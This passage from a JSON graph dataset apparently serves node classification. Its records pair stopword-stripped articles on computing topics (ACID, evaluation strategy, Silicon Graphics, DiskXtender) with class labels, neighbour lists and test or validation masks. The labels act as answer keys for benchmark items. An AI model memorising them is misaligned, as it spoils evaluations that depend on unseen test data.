cp hypervisor time-sharing timesharing based idea computers much faster humans one human user reading computer displayed screen computer useful work another user large time-sharing systems hundreds even thousands simultaneous users memory required programs data generally adds much physical memory attached computer time-sharing systems solve problem various combinations virtual memory memory management technique programs made work memory available actually attached computer running programs code data may scattered several areas physical memory even placed disk needed main components ibm virtual memory system functioning properly virtual memory system keeps active pages real memory inactive ones disk allows efficient execution systems workload virtual machine techniques enable several operating systems guest operating systems software run computer thinks whole computer simulated whole computers called virtual machine operating system really controls computer usually called hypervisor two major components hypervisor",
    "neighbors": [
      7173,
      10757,
      6664,
      6157,
      6675,
      4630,
      5658,
      7217,
      10803,
      5172,
      7733,
      573,
      2625,
      8272,
      5714,
      9811,
      8792,
      9829,
      6248,
      9330,
      2168,
      2172,
      3197,
      2179,
      10883,
      3725,
      9361,
      9370,
      4255,
      6311,
      7848,
      10413,
      8879,
      10415,
      9397,
      3771,
      4799,
      6850,
      1219,
      8388,
      6342,
      8393,
      8911,
      5840,
      1235,
      3816,
      9455,
      3323,
      9468,
      2813,
      10508,
      11024,
      11539,
      789,
      5397,
      3359,
      6442,
      1323,
      7983,
      7477,
      8502,
      8509,
      11075,
      5450,
      3916,
      2383,
      5457,
      7507,
      10072,
      859,
      863,
      868,
      3429,
      10094,
      5492,
      7032,
      3960,
      3966,
      8063,
      6529,
      4996,
      7053,
      5006,
      8077,
      11153,
      11673,
      6557,
      1952,
      9633,
      421,
      3493,
      3512,
      5562,
      8136,
      477,
      8175
    ],
    "mask": "Test"
  },
  {
    "node_id": 10041,
    "label": 6,
    "text": "DiskXtender:diskxtender emc diskxtender also known dx automated policy-based file system-centric product migrating inactive data higher-cost storage lower-cost disk tape optical devices hierarchical storage management diskxtender produced emc corporation supported windows linux unix environments windows version dx implements file-system filter driver intercepts user mode i/o requests intercepted requests processed dx components necessary files fetched secondary storage media passed back calling applications otherwise processing necessary filter driver nothing simply passes request stack lower level drivers applications implement similar architecture terms file system filters include anti-virus file system replication software 2003 diskxtender one three information lifecycle management offerings emc emc acquired legato system remaining products emailxtender databasextender archive email databases correspondingly diskxtender intercepting i/o operating system capable detecting inactive data migrating data secondary and/or tertiary storage lower cost/gbs still maintaining transparency applications end users applications end users full visibility migrated data access requested migrated data either redirected users applications copied back production system various times rumors end life diskxtender related products",
    "neighbors": [
      5492,
      6797,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 10042,
    "label": 9,
    "text": "Action_language:action language computer science action language language specifying state transition systems commonly used create formal models effects actions world action languages commonly used artificial intelligence robotics domains describe actions affect states systems time may used automated planning action languages fall two classes action description languages action query languages examples former include strips pddl language generalization strips propositional part pednault adl language b extension adding indirect effects distinguishing static dynamic laws language c adds indirect effects also assume every fluent automatically inertial also action query languages p q r. several different algorithms exist converting action languages particular action language c answer set programs since modern answer-set solvers make use boolean sat algorithms rapidly ascertain satisfiability implies action languages also enjoy progress made domain boolean sat solving action languages supplement definition state transition system set f fluents set v values fluents may take function mapping × f v set states state transition system",
    "neighbors": [
      9345,
      10819,
      6182,
      9926,
      9224,
      3529,
      9385,
      7851,
      8430,
      9494,
      1591,
      2680,
      5081,
      1051
    ],
    "mask": "None"
  },
  {
    "node_id": 10043,
    "label": 9,
    "text": "Evaluation_strategy:evaluation strategy evaluation strategies used programming languages determine evaluate argument function call function also read operation method relation kind value pass function example call value/call reference specifies function application evaluates argument proceeds evaluation function body passes two capabilities function namely ability look current value argument modify via assignment statement notion reduction strategy lambda calculus similar distinct practical terms many modern programming languages converged call-by-value/call-by-reference evaluation strategy function calls c java languages especially lower-level languages c++ combine several notions parameter passing historically call value call name date back algol 60 language designed late 1950s call reference used pl/i fortran systems purely functional languages like haskell well non-purely functional languages like r use call need evaluation strategy specified programming language definition function specific implementation strict evaluation arguments function always evaluated completely function applied church encoding eager evaluation operators maps strict evaluation functions reason strict evaluation sometimes called eager existing programming languages use strict evaluation functions applicative order leftmost innermost evaluation refers evaluation strategy arguments function evaluated left right post-order traversal reducible expressions es applicative order call-by-value evaluation call value also referred pass value common evaluation strategy used languages different c scheme call value argument expression evaluated resulting value bound corresponding variable function frequently copying value new memory region function procedure able assign values parameters local variable assigned—that anything passed function call unchanged caller scope function returns call value single evaluation strategy rather family evaluation strategies function argument evaluated passed function many programming languages common lisp eiffel java use call value evaluate function arguments left-to-right evaluate functions arguments right-to-left others scheme ocaml c leave order unspecified cases term call value problematic value passed value variable understood ordinary meaning value implementation-specific reference value effect syntactically looks like call value may end rather behaving like call reference call sharing often depending subtle aspects language semantics reason passing reference often language technically provide value representation complicated data instead represents data structure preserving semblance value appearance source code exactly boundary drawn proper values data structures masquerading often hard predict c array strings special cases data structure name array treated value reference first element array struct variable name refers value even fields vectors maple vector special case table therefore data structure list gets rendered indexed exactly way value tcl values dual-ported value representation used script level language manages corresponding data structure one required modifications made via data structure reflected back value representation vice versa description call value value reference common understood call reference another term call sharing thus behaviour call value java visual basic call value c pascal significantly different c pascal calling function large structure argument cause entire structure copied except actually reference structure potentially causing serious performance degradation mutations structure invisible caller however java visual basic reference structure copied fast mutations structure visible caller call reference also referred pass reference evaluation strategy function receives implicit reference variable used argument rather copy value typically means function modify i.e assign variable used argument—something seen caller call reference therefore used provide additional channel communication called function calling function call-by-reference language makes difficult programmer track effects function call may introduce subtle bugs simple litmus test whether language supports call-by-reference semantics possible write traditional codice_1 function language many languages support call reference form another comparatively use default fortran ii early example call-by-reference language languages c++ php visual basic .net c realbasic default call value offer special syntax call-by-reference parameters c++ additionally offers call reference const call reference simulated languages use call value n't exactly support call reference making use references objects refer objects pointers objects representing memory addresses objects languages c ml rust use technique separate evaluation strategy—the language calls value—but sometimes referred call address also referred pass address ml references type- memory- safe like rust similar effect achieved call sharing passing object mutated used languages like java python ruby purely functional languages typically semantic difference two strategies since data structures immutable possibility function modify arguments typically described call value even though implementations frequently use call reference internally efficiency benefits following example demonstrates call reference e following example call address simulates call reference c void modify int p int* q int* r int main call sharing also referred call object call object-sharing evaluation strategy first named barbara liskov et al language clu 1974 used languages python iota java object references ruby javascript scheme ocaml applescript many others however term call sharing common use terminology inconsistent across different sources example java community say java call value call sharing implies values language based objects rather primitive types i.e values boxed said pass copy reference primitives boxed passing unboxed called function semantics call sharing differ call reference particular call value mutations arguments performed called routine visible caller call reference access given variables caller merely certain objects e.g variable passed possible simulate assignment variable callee scope however since function access object caller copy made mutations objects objects mutable within function visible caller may appear differ call value semantics mutations mutable object within function visible caller object copied cloned — shared example python lists mutable def f list f print outputs codice_2 codice_3 method modifies object called assignments within function noticeable caller languages passing variable means passing access actual object referred variable access original caller variable since rebound variable exists within scope function counterpart caller retains original binding compare python mutation code binds formal argument new object def f list f print outputs codice_4 statement codice_5 reassigns new list variable rather location references immutable objects real difference call sharing call value except object identity visible language use call sharing mutable objects alternative input/output parameters parameter assigned argument overwritten object identity changed object argument mutated although term widespread usage python community identical semantics languages java visual basic often described call value value implied reference object call copy-restore also referred copy-in copy-out call value result call value return —as termed fortran community special case call reference provided reference unique caller variant gained attention multiprocessing contexts remote procedure call parameter function call reference might accessible another thread execution contents may copied new reference function call returns updated contents new reference copied back original reference restored semantics call copy-restore also differ call reference two function arguments alias one another point variable caller environment call reference writing one affect call copy-restore avoids giving function distinct copies leaves result caller environment undefined depending aliased arguments copied back first—will copies made left-to-right order entry return reference passed callee uninitialized evaluation strategy may called call result partial evaluation evaluation may continue body function applied sub-expressions contain unbound variables evaluated function applications whose argument values known may reduced presence side-effects complete partial evaluation may produce unintended results reason systems support partial evaluation tend pure expressions expressions without side-effects within functions non-strict evaluation arguments function evaluated unless actually used evaluation function body church encoding lazy evaluation operators maps non-strict evaluation functions reason non-strict evaluation often referred lazy boolean expressions many languages use form non-strict evaluation called short-circuit evaluation evaluation returns soon determined unambiguous boolean result—for example disjunctive expression true encountered conjunctive expression false encountered forth conditional expressions also usually use lazy evaluation evaluation returns soon unambiguous branch result normal-order leftmost outermost evaluation evaluation strategy outermost redex always reduced applying functions evaluating function arguments contrast call name evaluate inside body unapplied function call name evaluation strategy arguments function evaluated function called—rather substituted directly function body using capture-avoiding substitution left evaluated whenever appear function argument used function body argument never evaluated used several times re-evaluated time appears see jensen device call-by-name evaluation occasionally preferable call-by-value evaluation function argument used function call name save time evaluating argument whereas call value evaluate regardless argument non-terminating computation advantage enormous however function argument used call name often slower requiring mechanism thunk early use algol 60 today .net languages simulate call name using delegates expression parameters latter results abstract syntax tree given function eiffel provides agents represent operation evaluated needed seed7 provides call name function parameters java programs accomplish similar lazy evaluation using lambda expressions codice_6 interface call need memoized variant call name function argument evaluated value stored subsequent uses argument side-effect free produces results call name saving cost recomputing argument haskell well-known language uses call-by-need evaluation evaluation expressions may happen arbitrarily far computation haskell supports side-effects mutation via use monads eliminates unexpected behavior variables whose values change prior delayed evaluation r arguments passed call-by-need r allows arbitrary side-effects call-by-need arguments lazy evaluation commonly used implementation strategy call-by-need semantics variations exist—for instance optimistic evaluation .net languages implement call need using type codice_7 call macro expansion similar call name uses textual substitution rather capture-avoiding substitution uncautious use macro substitution may result variable capture lead undesired behavior hygienic macros avoid problem checking replacing shadowed variables parameters full β-reduction function application may reduced substituting function argument function using capture-avoiding substitution time may done even within body unapplied function call future also referred parallel call name concurrent evaluation strategy value future expression computed concurrently flow rest program one promises value future needed main program blocks future value promise one promises finishes computing already completed strategy non-deterministic evaluation occur time creation future i.e expression given use future value similar call need value computed computation may deferred value needed may started value future needed local variable function returns computation may terminated part-way implemented processes threads creating future spawn one new processes threads promises accessing value synchronize main thread terminating computation future corresponds killing promises computing value implemented coroutine .net async/await creating future calls coroutine async function may yield caller turn yielded back value used cooperatively multitasking optimistic evaluation another variant call need function argument partially evaluated amount time may adjusted runtime evaluation aborted function applied using call need approach avoids runtime expense call need still retaining desired termination characteristics",
    "neighbors": [
      256,
      512,
      3462,
      6536,
      1931,
      4877,
      6414,
      655,
      1936,
      5521,
      6160,
      10510,
      5911,
      3736,
      11674,
      7580,
      9245,
      8479,
      6306,
      8738,
      3876,
      10616,
      5677,
      5806,
      9008,
      692,
      3765,
      5684,
      7479,
      8502,
      2617,
      10555,
      10684,
      963,
      8644,
      70,
      8262,
      5833,
      1610,
      5961,
      7627,
      2381,
      8397,
      335,
      9804,
      7889,
      11212,
      11219,
      3960,
      5588,
      7894,
      10584,
      4057,
      7386,
      10586,
      4572,
      8926,
      9441,
      10083,
      1124,
      4069,
      4840,
      7273,
      8554,
      6640,
      10736,
      1016,
      3577,
      10618,
      380,
      2045,
      5503
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10044,
    "label": 9,
    "text": "Overhead_code:overhead code overhead code additional excess object code generated compiler provide machine code executed specific cpu code includes translations generic instructions listed cross-platform code tailored execution specific platform architecture example overhead code would code generated handle reference counting source code written high level language example cross-platform code coverage area standalone house space taken enclosures similarly overhead code part program listed source code however needed software operate properly",
    "neighbors": [
      8037,
      8262,
      5612,
      1776,
      9330,
      9490,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 10045,
    "label": 2,
    "text": "Android_Donut:android donut android donut fourth version open source android mobile operating system developed google longer supported among prominent features introduced update added support cdma smartphones additional screen sizes battery usage indicator text-to-speech engine public release donut—its official dessert-themed code name convention employed google designate major android versions—carriers quick follow roll customers form over-the-air ota update compatible smartphones",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8794,
      8285,
      2658,
      8821,
      11391,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      11590,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      3533,
      2001,
      479,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10046,
    "label": 4,
    "text": "Associated_Signature_Containers:associated signature containers associated signature containers asic specifies use container structures bind together one signed objects either advanced electronic signatures timestamp tokens one single digital container eidas-regulation associated signature container asic eidas data container used hold group file objects digital signatures and/or time assertions associated objects data stored asic zip format european commission implementing decision 2015/1506 8 september 2015 laid specifications relating formats advanced electronic signatures advanced seals recognised public sector bodies pursuant articles 27 37 eidas-regulation eu member states requiring advanced electronic signature advanced electronic signature based qualified certificate shall recognise xml cms pdf advanced electronic signature conformance level b lt level using associated signature container signatures comply following technical specifications technical specification asics updated standardized since april 2016 european telecommunications standards institute standard associated signature containers asic etsi en 319 162-1 v1.1.1 2016-04 updated standard required european commission implementing decision internal structure asic includes two folders electronic signature file would contain single cades object one xades signatures time assertion file would either contain one timestamp token conform ietf rfc 3161 whereas single evidence record would conform ietf rfc 4998 ietf rfc6283 one purposes electronic signature secure data attached modified done creating dataset combines signature signed data store detached signature separate resource utilize external process re-associate signature data advantageous use detached signatures prevents unauthorized modifications original data objects however risk detached signature become separated associated data happen association would lost therefore data would become inaccessible one widespread deployments asic standard estonian digital signature system use multiplatform windows linux macos osx software called digidoc using correct tool job always important using correct type asic container job hand also important container single file object associated signature time assertion file “ mimetype ” file specifies media type might also included container mimetype file included required first file asic container container type allow additional signatures added future used sign stored file objects long-term time-stamp tokens used asic archive manifest files used protect long-term time-stamp tokens tampering type container hold one signature time assertion files asic-e xades deals signature files asic-e cades deals time assertions files within asic containers apply file object sets file object might additional metadata information associated also protected signature asic-e container could designed prevent modification allow inclusion without causing damage previous signatures asic containers capable maintaining long-term availability integrity storing xades cades signatures use time-stamp tokens evidence record manifest files contained within containers asic containers must comply zip specification limitations applied zip container operates baseline requirements asic simple asic-s container also provides additional time assertion requirements additional elements may within meta-inf folder requires use “ signeddata ” variable include certificate revocation information container baselines asic-e container additional restrictions container complies asic-e baseline requirements along additional requirements restrictions use asic reduces risk electronic signature becoming separated data combining signature signed data container elements secured within asic easier distribute signature guarantee correct signature metadata used validation process also used associating time assertions including evidence records time-stamp tokens associated data",
    "neighbors": [
      5200,
      3921,
      10801
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10047,
    "label": 9,
    "text": "Joseph_Henry_Wegstein:joseph henry wegstein joseph henry wegstein april 7 1922 washburn illinois august 16 1985 american computer scientist wegstein attended university illinois graduated master degree physics 1948 worked national bureau standards nist specialized standards automatic data processing particular technology fingerprint recognition participated conferences zurich 1958 paris 1960 developed programming languages algol 58 algol 60 respectively member codasyl committee involved development cobol language",
    "neighbors": [
      512,
      8262,
      1610,
      9804,
      8813
    ],
    "mask": "None"
  },
  {
    "node_id": 10048,
    "label": 1,
    "text": "ACID:acid computer science acid atomicity consistency isolation durability set properties database transactions intended guarantee validity even event errors power failures etc context databases sequence database operations satisfies acid properties perceived single logical operation data called transaction example transfer funds one bank account another even involving multiple changes debiting one account crediting another single transaction 1983 andreas reuter theo härder coined acronym acid shorthand atomicity consistency isolation durability building earlier work jim gray enumerated atomicity consistency durability left isolation characterizing transaction concept four properties describe major guarantees transaction paradigm influenced many aspects development database systems according gray reuter ims supported acid transactions early 1973 although term acid came later characteristics four properties defined reuter härder follows transactions often composed multiple statements atomicity guarantees transaction treated single unit either succeeds completely fails completely statements constituting transaction fails complete entire transaction fails database left unchanged atomic system must guarantee atomicity every situation including power failures errors crashes consistency ensures transaction bring database one valid state another maintaining database invariants data written database must valid according defined rules including constraints cascades triggers combination thereof prevents database corruption illegal transaction guarantee transaction correct referential integrity guarantees primary key foreign key relationship transactions often executed concurrently e.g. multiple transactions reading writing table time isolation ensures concurrent execution transactions leaves database state would obtained transactions executed sequentially isolation main goal concurrency control depending method used effects incomplete transaction might even visible transactions durability guarantees transaction committed remain committed even case system failure e.g. power outage crash usually means completed transactions effects recorded non-volatile memory following examples illustrate acid properties examples database table two columns b integrity constraint requires value value b must sum 100 following sql code creates table described create table acidtest integer b integer check b 100 series database operations atomic transaction either occur none occur series operations separated executed makes series operations indivisible guarantee atomicity prevents updates database occurring partially cause greater problems rejecting whole series outright words atomicity means indivisibility irreducibility alternatively may say logical transaction may made composed one several physical transactions unless component physical transactions executed logical transaction occurred – effects database say logical transaction consists transferring funds account account b logical transaction may composed several physical transactions consisting first removing amount account first physical transaction second transaction depositing said amount account b would want see amount removed account sure transferred account b unless transactions happened amount transferred account b transfer effects database occurred consistency general term demands data must meet validation rules previous example validation requirement b 100 validation rules must checked ensure consistency assume transaction attempts subtract 10 without altering b consistency checked transaction known b 100 transaction begins transaction removes 10 successfully atomicity achieved however validation check show b 90 inconsistent rules database entire transaction must cancelled affected rows rolled back pre-transaction state constraints triggers cascades every single change operation would checked way transaction committed similar issues may arise constraints may required data types b integers enter say value 13.5 transaction cancelled system may give rise alert form trigger if/when trigger written effect another example would integrity constraints would allow us delete row one table whose primary key referred least one foreign key tables demonstrate isolation assume two transactions execute time attempting modify data one two must wait completes order maintain isolation consider two transactions transfers 10 b. transfers 20 b combined four actions operations performed order isolation maintained although must wait consider happens fails halfway database eliminates effects sees valid data interleaving transactions actual order actions might consider happens fails modifying b step 4 time fails already modified restored value without leaving invalid database known write-write failure two transactions attempted write data field typical system problem would resolved reverting last known good state canceling failed transaction restarting interrupted transaction good state consider transaction transfers 10 b first removes 10 adds 10 b point user told transaction success however changes still queued disk buffer waiting committed disk power fails changes lost user assumes understandably changes persist processing transaction often requires sequence operations subject failure number reasons instance system may room left disk drives may used allocated cpu time two popular families techniques write-ahead logging shadow paging cases locks must acquired information updated depending level isolation possibly data may read well write ahead logging atomicity guaranteed copying original unchanged data log changing database allows database return consistent state event crash shadowing updates applied partial copy database new copy activated transaction commits many databases rely upon locking provide acid capabilities locking means transaction marks data accesses dbms knows allow transactions modify first transaction succeeds fails lock must always acquired processing data including data read modified non-trivial transactions typically require large number locks resulting substantial overhead well blocking transactions example user running transaction read row data user b wants modify user b must wait user transaction completes two phase locking often applied guarantee full isolation alternative locking multiversion concurrency control database provides reading transaction prior unmodified version data modified another active transaction allows readers operate without acquiring locks i.e. writing transactions block reading transactions readers block writers going back example user transaction requests data user b modifying database provides version data existed user b started transaction user gets consistent view database even users changing data one implementation namely snapshot isolation relaxes isolation property guaranteeing acid properties distributed transaction across distributed database single node responsible data affecting transaction presents additional complications network connections might fail one node might successfully complete part transaction required roll back changes failure another node two-phase commit protocol confused two-phase locking provides atomicity distributed transactions ensure participant transaction agrees whether transaction committed briefly first phase one node coordinator interrogates nodes participants reply prepared coordinator second phase formalize transaction",
    "neighbors": [
      8195,
      9224,
      8201,
      1034,
      2068,
      4630,
      1049,
      5658,
      9248,
      7202,
      6184,
      1577,
      10793,
      1579,
      10286,
      6709,
      1594,
      11324,
      3648,
      1606,
      9286,
      2632,
      9290,
      8788,
      10326,
      4183,
      4696,
      7767,
      1636,
      9828,
      10340,
      8295,
      8808,
      2669,
      1136,
      11377,
      3188,
      9335,
      1146,
      3196,
      10374,
      3219,
      10389,
      4255,
      4263,
      10921,
      9386,
      7339,
      10413,
      6831,
      9397,
      7868,
      6850,
      1222,
      2246,
      3784,
      6346,
      4811,
      2780,
      734,
      10471,
      6383,
      5364,
      7412,
      5373,
      9988,
      6920,
      11024,
      8979,
      8981,
      7446,
      11030,
      5401,
      5403,
      7453,
      6433,
      2344,
      9010,
      5940,
      1341,
      2369,
      5441,
      5953,
      8006,
      3400,
      5452,
      2901,
      10069,
      8539,
      9075,
      10632,
      2456,
      9112,
      10137,
      1950,
      9631,
      9634,
      5029,
      1447,
      7080,
      5546,
      3004,
      3517,
      3518,
      11203,
      10201,
      987,
      4065,
      6124,
      2544,
      10737
    ],
    "mask": "None"
  },
  {
    "node_id": 10049,
    "label": 9,
    "text": "Robin_Milner:robin milner arthur john robin gorell milner 13 january 1934 – 20 march 2010 known robin milner a. j. r. g. milner british computer scientist turing award winner milner born yealmpton near plymouth england military family awarded scholarship eton college 1947 subsequently served royal engineers attaining rank second lieutenant enrolled king college cambridge graduating 1957 milner first worked schoolteacher programmer ferranti entering academia city university london swansea university stanford university 1973 university edinburgh co-founder laboratory foundations computer science lfcs returned cambridge head computer laboratory 1995 eventually stepped although still laboratory 2009 milner sicsa advanced research fellow held part-time chair computer science university edinburgh milner died heart attack 20 march 2010 cambridge wife lucy died shortly milner generally regarded made three major contributions computer science developed lcf one first tools automated theorem proving language developed lcf ml first language polymorphic type inference type-safe exception handling different area milner also developed theoretical framework analyzing concurrent systems calculus communicating systems ccs successor pi-calculus time death working bigraphs formalism ubiquitous computing subsuming ccs pi-calculus also credited rediscovering hindley–milner type system made fellow royal society distinguished fellow british computer society 1988 milner received acm turing award 1991 1994 inducted fellow acm 2004 royal society edinburgh awarded milner royal medal bringing public benefits global scale 2008 elected foreign associate national academy engineering fundamental contributions computer science including development lcf ml ccs pi-calculus see also publications robin milner dblp",
    "neighbors": [
      6536,
      7048,
      11020,
      11032,
      415,
      6306,
      10668,
      10031,
      2482,
      4916,
      1976,
      4799,
      4800,
      4930,
      70,
      8262,
      3529,
      5585,
      3929,
      7386,
      1883,
      4572,
      7775,
      7394,
      9315,
      11490,
      11242,
      2283,
      2798,
      10102,
      1783,
      511
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10050,
    "label": 4,
    "text": "Data_Protection_Officer:data protection officer data protection officer dpo ensures independent manner organization applies laws protecting individuals ’ personal data designation position tasks dpo within organization described articles 37 38 39 eu general data protection regulation gdpr according gdpr data protection officer shall directly report highest management level ’ mean dpo line managed level must direct access give advice senior managers making decisions personal data processing core responsibilities dpo include ensuring his/her organization aware trained relevant gdpr obligations conducting audits ensure compliance address potential issues proactively acting liaison his/her organization public regarding data privacy matters germany since 2001 dpo additional protections laid avoid companies discharge dpo simply job since may 2018 gdpr introduced similar protections across eu gdpr article 38",
    "neighbors": [
      2818,
      3858,
      9901
    ],
    "mask": "None"
  },
  {
    "node_id": 10051,
    "label": 3,
    "text": "Silicon_Graphics:silicon graphics silicon graphics inc. later rebranded sgi historically known silicon graphics computer systems sgcs american high-performance computing manufacturer producing computer hardware software founded mountain view california november 1981 jim clark initial market 3d graphics computer workstations products strategies market positions developed significantly time early systems based geometry engine clark marc hannah developed stanford university derived clark broader background computer graphics geometry engine first very-large-scale integration vlsi implementation geometry pipeline specialized hardware accelerated inner-loop geometric computations needed display three-dimensional images much history company focused 3d imaging major supplier hardware software market silicon graphics reincorporated delaware corporation january 1990 mid late-1990s rapidly improving performance commodity wintel machines began erode sgi stronghold 3d market porting maya platforms major event process sgi made several attempts address including disastrous move existing mips platforms intel itanium well introducing linux-based intel ia-32 based workstations servers failed market mid-2000s company repositioned supercomputer vendor move also failed april 1 2009 sgi filed chapter 11 bankruptcy protection announced would sell substantially assets rackable systems deal finalized may 11 2009 rackable assuming name silicon graphics international remains silicon graphics inc. became graphics properties holdings inc. james h. clark left position electrical engineering associate professor stanford university found sgi 1982 along group seven graduate students research staff stanford kurt akeley david j brown tom davis rocky rhodes marc hannah herb kuta mark grossman along abbey silverstone others ed mccracken ceo silicon graphics 1984 1997 years sgi grew annual revenues 5.4 million 3.7 billion addition 3d graphic capabilities pcs ability clusters linux- bsd-based pcs take many tasks larger sgi servers ate sgi core markets porting maya linux mac os x microsoft windows eroded low end sgi product line response challenges faced marketplace falling share price ed mccracken fired sgi brought richard belluzzo replace belluzzo leadership number initiatives taken considered accelerated corporate decline one initiative trying sell workstations running windows nt called visual workstations instead ones ran irix company version unix put company even direct competition likes dell making difficult justify price premium product line unsuccessful abandoned years later sgi premature announcement migration mips itanium abortive ventures ia-32 architecture systems visual workstation line ex-intergraph zx10 range sgi 1000-series linux servers damaged sgi credibility market 1999 attempt clarify current market position graphics company silicon graphics inc. changed corporate identity sgi although legal name unchanged time sgi announced new logo consisting letters sgi proprietary font called sgi created branding design consulting firm landor associates collaboration designer joe stitzlein sgi continued use silicon graphics name workstation product line later re-adopted cube logo workstation models november 2005 sgi announced delisted new york stock exchange common stock fallen minimum share price listing exchange sgi market capitalization dwindled peak seven billion dollars 1995 120 million time delisting february 2006 sgi noted could run cash end year mid-2005 sgi hired alix partners advise returning profitability received new line credit sgi announced postponing scheduled annual december stockholders meeting march 2006 proposed reverse stock split deal de-listing new york stock exchange january 2006 sgi hired dennis mckenna new ceo chairman board directors mr. mckenna succeeded robert bishop remained vice chairman board directors may 8 2006 sgi announced filed chapter 11 bankruptcy protection u.s. subsidiaries part plan reduce debt 250 million two days later u.s. bankruptcy court approved first day motions use 70 million financing facility provided group bondholders foreign subsidiaries unaffected september 6 2006 sgi announced end development mips/irix line irix operating system production would end december 29 last orders would fulfilled march 2007 support products would end december 2013 sgi emerged bankruptcy protection october 17 2006 stock symbol point sgid.pk canceled new stock issued nasdaq exchange symbol sgic new stock distributed company creditors sgid common stockholders left worthless shares end year company moved headquarters mountain view sunnyvale earlier north shoreline headquarters occupied computer history museum newer amphitheater parkway headquarters sold google locations award-winning designs studios architecture april 2008 sgi re-entered visualization market sgi virtu range visualization servers workstations re-badged systems boxx technologies based intel xeon amd opteron processors nvidia quadro graphics chipsets running red hat enterprise linux suse linux enterprise server windows compute cluster server december 2008 sgi received delisting notification nasdaq market value minimum 35 million requirement 10 consecutive trading days also meet nasdaq alternative requirements minimum stockholders equity 2.5 million annual net income continuing operations 500,000 april 1 2009 sgi filed chapter 11 announced would sell substantially assets rackable systems 25 million sale ultimately 42.5 million finalized may 11 2009 time rackable announced adoption silicon graphics international global name brand bankruptcy court scheduled continuing proceedings hearings june 3 24 2009 july 22 2009 rackable acquisition vizworld magazine published series six articles chronicle downfall sgi hewlett packard enterprise acquired sgi november 2016 allowed hpe place top500 nasa ames research center pleiades sgi ice supercomputer portfolio sgi continuous presence high performance compute silicon graphics inc. second bankruptcy phase renamed graphics properties holdings inc. gphi june 2009 2010 gphi announced significant favorable ruling litigation ati technologies amd june 2010 following patent lawsuit originally filed silicon graphics inc. era following 2008 appeal ati validity '327 silicon graphics inc voluntary dismissal '376 patent lawsuit federal circuit upheld jury verdict validity gphi u.s. patent 6,650,327 furthermore found amd lost right challenge patent validity future proceedings january 31 2011 district court entered order permits amd pursue invalidity affirmative defense trial permit sgi accuse amd radeon r700 series graphics products infringement case april 18 2011 gphi amd entered confidential settlement license agreement resolved litigation matter immaterial amount provides immunity gphi patents alleged infringement amd products including components software designs april 26 2011 court entered order granting parties agreed motion dismissal final judgment 2011-11 gphi filed another patent infringement lawsuit apple inc. delaware involving patents original patent infringement case apple last november alleged violation u.s. patents 6,650,327 '327 '145 '881 2012 gphi filed lawsuit apple sony htc corp lg electronics inc. samsung electronics co. research motion ltd. allegedly violating patent relating computer graphics process turns text images pixels displayed screens affected devices include apple iphone htc evo4g lg thrill research motion torch samsung galaxy galaxy ii sony xperia play smartphones sgi first generation products starting iris integrated raster imaging system 1000 series high-performance graphics terminals based motorola 68000 family microprocessors later iris 2000 3000 models developed full unix workstations first entries 1000 series models 1000 1200 introduced 1984 graphics terminals peripherals connected general-purpose computer digital equipment corporation vax provide graphical raster display abilities used 8 mhz motorola 68000 cpus ram disk drives booted network via excelan exos/101 ethernet card controlling computer used pm1 cpu board variant board used stanford university sun workstation later sun-1 workstation sun microsystems graphics system composed gf1 frame buffer uc3 update controller dc3 display controller bp2 bitplane 1000-series machines designed around multibus standard later 1000-series machines 1400 1500 ran 10 mhz 1.5 mb ram 1400 73 mb st-506 disk drive 1500 474 mb smd-based disk drive xylogics 450 disk controller may used pm2 cpu pm2m1 ram board 2000 series usual monitor 1000 series ran 30 hz interlaced six beta-test units 1400 workstation produced first production unit sgi first commercial computer shipped carnegie-mellon university electronic imaging laboratory 1984 sgi rapidly developed machines workstations second product line — iris 2000 series first released august 1985 sgi began using unix system v operating system five models two product ranges 2000/2200/2300/2400/2500 range used 68010 cpus pm2 cpu module later turbo systems 2300t 2400t 2500t 68020s ip2 cpu module used excelan exos/201 ethernet card graphics hardware gf2 frame buffer uc4 update controller dc4 display controller bp3 bitplane main differences cpu ram weitek floating point accelerator boards disk controllers disk drives st-506 smd available could upgraded example 2400 2400t 2500 2500t larger chassis standard 6 19 eia rack space bottom two smd disk drives weighing approximately non-turbo models used multibus cpu communicate floating point accelerator turbos added ribbon cable dedicated 60 hz monitors used 2000 series height machines using motorola cpus reached iris 3000 series models 3010/3020/3030 3110/3115/3120/3130 30s full-size rack machines used graphics subsystem ethernet 2000s could also use 12 geometry engines first widespread use hardware graphics accelerators standard monitor 19 60 hz non-interlaced unit tilt/swivel base 19 30 hz interlaced 15 60 hz non-interlaced tilt/swivel base also available iris 3130 smaller siblings impressive time complete unix workstations 3130 powerful enough support complete 3d animation rendering package without mainframe support large capacity hard drives standards day two 300 mb drives streaming tape ethernet could centerpiece animation operation line formally discontinued november 1989 3500 systems shipped 2000 3000 models combined introduction iris 4d series sgi switched mips microprocessors machines powerful came powerful on-board floating-point capability 3d graphics became popular television film time systems responsible establishing much sgi reputation sgi produced broad range mips-based workstations servers 1990s running sgi version unix system v called irix included massive onyx visualization systems size refrigerators capable supporting 64 processors managing three streams high resolution fully realized 3d graphics october 1991 mips announced first commercially available 64-bit microprocessor r4000 sgi used r4000 crimson workstation irix 6.2 first fully 64-bit irix release including 64-bit pointers secure supply future generations mips microprocessors 64-bit r4000 sgi acquired company 1992 333 million renamed mips technologies inc. wholly owned subsidiary sgi 1993 silicon graphics sgi signed deal nintendo develop reality coprocessor rcp gpu used nintendo 64 n64 video game console deal signed early 1993 later made public august year console later 